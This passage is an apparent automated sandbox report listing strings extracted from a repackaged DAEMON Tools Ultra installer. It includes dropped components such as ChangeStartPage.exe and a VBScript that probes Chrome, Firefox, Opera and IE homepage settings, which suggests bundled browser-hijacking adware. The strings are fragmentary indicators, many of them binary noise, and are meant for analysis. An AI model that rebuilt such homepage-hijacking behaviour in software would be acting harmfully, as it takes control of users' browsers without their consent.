Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

dddd, MMMM dd, yyyy

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

DdDdDdDd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ddDFDD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ddFDdD@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ddFDdDf`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DebugFlags

Unicode based on Runtime Data (dtinst.exe )

DebugHeapFlags

Unicode based on Runtime Data (DiscSoftBusService.exe )

December

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

DecodePointer

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

Default

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

DefaultConsent

Unicode based on Runtime Data (dtinst.exe )

DefaultDestDir = 12

Ansi based on Dropped File (SET4F37.tmp)

DefaultOverrideBehavior

Unicode based on Runtime Data (dtinst.exe )

DefWindowProcA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

DefWindowProcW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DelegateExecute

Unicode based on Runtime Data (DiscSoftBusService.exe )

Delete

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Delete a Registry key.

Ansi based on Dropped File (JSSys3.dll.204366558)

Delete a Registry key.4

Ansi based on Dropped File (JSSys3.dll.204366558)

Delete a Registry value.

Ansi based on Dropped File (JSSys3.dll.204366558)

Delete an ADS file.

Ansi based on Dropped File (JSSys3.dll.204366558)

Delete an ADS file.WW(

Ansi based on Dropped File (JSSys3.dll.204366558)

DeleteCriticalSection

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

DeleteFileA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

DeleteFileW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DeleteFlag

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

DeleteObject

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DeleteService

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

DeleteStream

Ansi based on Dropped File (JSSys3.dll.204366558)

Description

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Desktop

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DestroyWindow

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

dev%d

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

DeviceParams

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

DevicePath

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DevicesCount

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

DevicesState

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

dfDdFDdFF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DFFF>>F>>GGZZxZ]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

dfFfFdFDD`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

dgtU1n85*@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

dgxEE&"ir"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

dh11X!,T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DiagLevel

Unicode based on Runtime Data (dtinst.exe )

DiagMatchAnyMask

Unicode based on Runtime Data (dtinst.exe )

DialogBoxParamA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

DialogBoxParamW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DIFxAPI.dll

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

DiInstallDevice

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

Dim amigocheck

Ansi based on Dropped File (start72urez3kr.vbs)

Dim boolFound

Ansi based on Dropped File (start72urez3kr.vbs)

Dim chromecheck

Ansi based on Dropped File (start72urez3kr.vbs)

Dim firefoxcheck

Ansi based on Dropped File (start72urez3kr.vbs)

Dim iecheck

Ansi based on Dropped File (start72urez3kr.vbs)

Dim objFSO

Ansi based on Dropped File (start72urez3kr.vbs)

Dim objINIEdit

Ansi based on Dropped File (start72urez3kr.vbs)

Dim objRegExp_HomePage

Ansi based on Dropped File (start72urez3kr.vbs)

Dim objSWbemLocator

Ansi based on Dropped File (start72urez3kr.vbs)

Dim objSWbemObjectEx

Ansi based on Dropped File (start72urez3kr.vbs)

Dim objSWbemServicesEx

Ansi based on Dropped File (start72urez3kr.vbs)

Dim operacheck

Ansi based on Dropped File (start72urez3kr.vbs)

Dim strComputer

Ansi based on Dropped File (start72urez3kr.vbs)

Dim strContent

Ansi based on Dropped File (start72urez3kr.vbs)

Dim strCurrentVersion

Ansi based on Dropped File (start72urez3kr.vbs)

Dim strPrefsPath

Ansi based on Dropped File (start72urez3kr.vbs)

Dim strProfilePath

Ansi based on Dropped File (start72urez3kr.vbs)

Dim strProfilesFileName

Ansi based on Dropped File (start72urez3kr.vbs)

Dim strSection

Ansi based on Dropped File (start72urez3kr.vbs)

Disable

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DisableArchive

Unicode based on Runtime Data (dtinst.exe )

DisableCANameConstraints

Unicode based on Runtime Data (dtinst.exe )

Disabled

Unicode based on Runtime Data (dtinst.exe )

DisableDecoratedModelsRequirement

Unicode based on Runtime Data (dtinst.exe )

DisableImprovedZoneCheck

Unicode based on Runtime Data (DiscSoftBusService.exe )

DisableLocalOverride

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DisableMandatoryBasicConstraints

Unicode based on Runtime Data (dtinst.exe )

DisableMetaFiles

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DisableQueue

Unicode based on Runtime Data (dtinst.exe )

DisableSecuritySettingsCheck

Unicode based on Runtime Data (DiscSoftBusService.exe )

DisableThreadLibraryCalls

Ansi based on Dropped File (Tages.dll.423655889)

DisableUnsupportedCriticalExtensions

Unicode based on Runtime Data (dtinst.exe )

DisableUserModeCallbackFilter

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Disc soft DT Ultra bus service

Unicode based on Runtime Data (DiscSoftBusService.exe )

Disc Soft Ltd

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

Disc Soft Ultra Bus Service

Unicode based on Runtime Data (DiscSoftBusService.exe )

DiscSoft

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

DiscSoftBusService.exe

Unicode based on Runtime Data (nsF6AA.tmp )

DiscSoftBusServiceLib

Unicode based on Runtime Data (DiscSoftBusService.exe )

DispatchMessageA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

DispatchMessageW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DisplayIcon

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DisplayName

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DisplayName = %DTULTRASCSIBUS.DeviceDesc%

Ansi based on Dropped File (SET4F37.tmp)

DllCanUnloadNow

Ansi based on Dropped File (JSSys3.dll.204366558)

DllFunctionCall

Ansi based on Dropped File (JSSys3.dll.204366558)

DllGetClassObject

Ansi based on Dropped File (JSSys3.dll.204366558)

DllGetVersion

Unicode based on Dropped File (JSSys3.dll.204366558)

DllRegisterServer

Ansi based on Dropped File (JSSys3.dll.204366558)

DllUnregisterServer

Ansi based on Dropped File (JSSys3.dll.204366558)

dM32,ynzQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

dN%MqdyqoA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DocObject

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

doHGE>>;;:<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DomIcI)%@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DontPrettyPath

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DontSendAdditionalData

Unicode based on Runtime Data (dtinst.exe )

DontShowUI

Unicode based on Runtime Data (dtinst.exe )

DOpen

Ansi based on Dropped File (JSSys3.dll.204366558)

DOpenMulti

Ansi based on Dropped File (JSSys3.dll.204366558)

DQ+C,%^ob

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DQ^lduQy&r"!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

dragSelectionBorder

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DrawFocusRect

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

DrawTextA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

DrawTextW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DriveMask

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DriverPackageGetPathW

Ansi based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

DriverPackagePreinstallW

Ansi based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

DriverPackageUninstallW

Ansi based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

DriverVer=12/08/2014,5.24.0.0

Ansi based on Dropped File (SET4F37.tmp)

DSave

Ansi based on Dropped File (JSSys3.dll.204366558)

DSBusUltraService Class

Unicode based on Runtime Data (DiscSoftBusService.exe )

Dsstsfttt}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DT Soft Ltd.

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

DT USB Monitor Driver

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

DTAgent.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DTCDROM

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

dtinst.exe

Unicode based on Runtime Data (DiscSoftBusService.exe )

DTSOFTBUS

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

dtsoftbus01.inf

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

DTUltra.exe

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

dtultrascsibus

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

dtultrascsibus.cat

Unicode based on Runtime Data (dtinst.exe )

DTULTRASCSIBUS.DeviceDesc = "DAEMON Tools Ultra Virtual SCSI Bus"

Ansi based on Dropped File (SET4F37.tmp)

dtultrascsibus.inf

Unicode based on Runtime Data (dtinst.exe )

dtultrascsibus.sys

Unicode based on Runtime Data (dtinst.exe )

dtultrascsibus.sys = 1

Ansi based on Dropped File (SET4F37.tmp)

DTUsb

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

dtusb.inf

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

dtusb.sys

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

dtusbbus

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

dtusbbus.sys

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

DTUsbMon

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

dtusbmon.sys

Unicode based on Hybrid Analysis (dtinst.exe , 00040010-00003808.00000000.40510.00841000.00000020.mdmp)

Du #TrO,y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

dVVVPMMMKK66-6-,--3R

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

dXXQMTMKNM66K--6-:<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

d}hYI}h/k

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

e *`_z-X&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E!<E(* 6d

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

e"k\*UH97

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

e%2Cwuc40G

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

e,+LVU1e~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

e,Ca&rut?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E,h1s'iP

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E-pG2=AAZ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

e-xlS;Sj[~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E8,]prGb?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E:\Projects\dtpro\service\vdrive\_dtinstall\Release\dtinst32.pdb

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

e@'EBb{;{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E[;)#uPTu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E_[

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

e`4H9ci.3k

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ease wait while Setup is loading...

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

eBar2

Unicode based on Dropped File (JSSys3.dll.204366558)

een called

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

EFAULT\Control Panel\International

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

efEp#rv,L

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Efqsqurxr

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

eg$~``2Ds

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EG&+K"M+qw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EHnkHp#lM

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

eInfoEx

Unicode based on Dropped File (JSSys3.dll.204366558)

eKfl{1:0"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ek{W*::Dd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EL TORITO SPECIFICATION

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

emFY${O{nk/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EmptyClipboard

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

en-US

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Enable

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

EnableAnchorContext

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

EnableBalloonTips

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Enabled

Unicode based on Runtime Data (dtinst.exe )

EnableMenuItem

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EnablePunycode

Unicode based on Runtime Data (DiscSoftBusService.exe )

EnableWeakSignatureFlags

Unicode based on Runtime Data (dtinst.exe )

EnableWindow

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EncodePointer

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

End Function

Ansi based on Dropped File (start72urez3kr.vbs)

End If

Ansi based on Dropped File (start72urez3kr.vbs)

End if

Ansi based on Dropped File (start72urez3kr.vbs)

End Select

Ansi based on Dropped File (start72urez3kr.vbs)

End Sub

Ansi based on Dropped File (start72urez3kr.vbs)

End With

Ansi based on Dropped File (start72urez3kr.vbs)

EndDialog

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EndPaint

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

Engine.dll

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

EnterCriticalSection

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

EnumSystemLocalesEx

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

EnumWindows

Ansi based on Dropped File (JSSys3.dll.204366558)

EpBhcKq%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ePreinstallW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

ePX2tBFTB

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

eq]IB-.g\V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

eQcee`oo`o

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

equest time out.

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

ErAE<TI"O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

error

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

Error launching installer

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Error writing temporary file. Make sure your temp folder is valid.

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ErrorControl = 1

Ansi based on Dropped File (SET4F37.tmp)

ers\43VNeoC\AppData\Local\Temp\nsrD151.tmp\nsDialogs.dll

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

ersionIndependentProgID

Unicode based on Dropped File (JSSys3.dll.204366558)

esday

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

etVersion

Unicode based on Dropped File (JSSys3.dll.204366558)

EVENT_SINK_AddRef

Ansi based on Dropped File (JSSys3.dll.204366558)

EVENT_SINK_QueryInterface

Ansi based on Dropped File (JSSys3.dll.204366558)

EVENT_SINK_Release

Ansi based on Dropped File (JSSys3.dll.204366558)

Ew6_=}"?D|s}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EWkgf<6Z[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ExecToStack

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

exeName

Ansi based on Dropped File (JSSys3.dll.204366558)

exeNameW

Ansi based on Dropped File (JSSys3.dll.204366558)

Exit For

Ansi based on Dropped File (start72urez3kr.vbs)

Exit Sub

Ansi based on Dropped File (start72urez3kr.vbs)

ExitProcess

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ExitWin

Ansi based on Dropped File (JSSys3.dll.204366558)

ExitWindowsEx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ExpandEnvironmentStringsA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

ExpandEnvironmentStringsW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

EZA)e

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

E{g[;t=(W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

F)v"<q0>lYaX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

f+3Jzy$d

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

f/@8kbH+#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

F0#9|Lm_)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

f7w`.XuX=~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

F9CJP6L[!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

f`$5M-GYG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

false

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Favorites

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

fd=,D

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FdFdFFFDFFF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

February

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

FFdD`B@Dd`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

fFfFF@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ffffffff

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

FileDescription

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FileInfo

Unicode based on Dropped File (imgengine.dll.62529018)

Filename

Unicode based on Dropped File (Tages.dll.423655889)

Files(*.

Unicode based on Dropped File (JSSys3.dll.204366558)

Files(*.txt)

Unicode based on Dropped File (JSSys3.dll.204366558)

Files_AEmON

Ansi based on Image Processing (screen_4.png)

Files|*.*

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

FileTimeToLocalFileTime

Ansi based on Dropped File (JSSys3.dll.204366558)

FileTimeToSystemTime

Ansi based on Dropped File (JSSys3.dll.204366558)

FileVersion

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FillRect

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

Filter

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

filterExtensions

Ansi based on Dropped File (JSSys3.dll.204366558)

filterNameType

Ansi based on Dropped File (JSSys3.dll.204366558)

Find whether given CLSID is registered.

Ansi based on Dropped File (JSSys3.dll.204366558)

Find whether given CLSID is registered.WWW(

Ansi based on Dropped File (JSSys3.dll.204366558)

Find whether given ProgID is registered.

Ansi based on Dropped File (JSSys3.dll.204366558)

Find whether given ProgID is registered.WW&

Ansi based on Dropped File (JSSys3.dll.204366558)

FindClose

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FindFirstFileA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

FindFirstFileW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FindNextFileA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

FindNextFileW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FindWindowA

Ansi based on Dropped File (JSSys3.dll.204366558)

FindWindowExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

FindWindowExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FipsAlgorithmPolicy

Unicode based on Runtime Data (dtinst.exe )

firefoxcheck = 1

Ansi based on Dropped File (start72urez3kr.vbs)

fjrN8/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Fl I?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Flags

Unicode based on Runtime Data (DiscSoftBusService.exe )

FlsAlloc

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

FlsFree

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

FlsGetValue

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

FlsSetValue

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

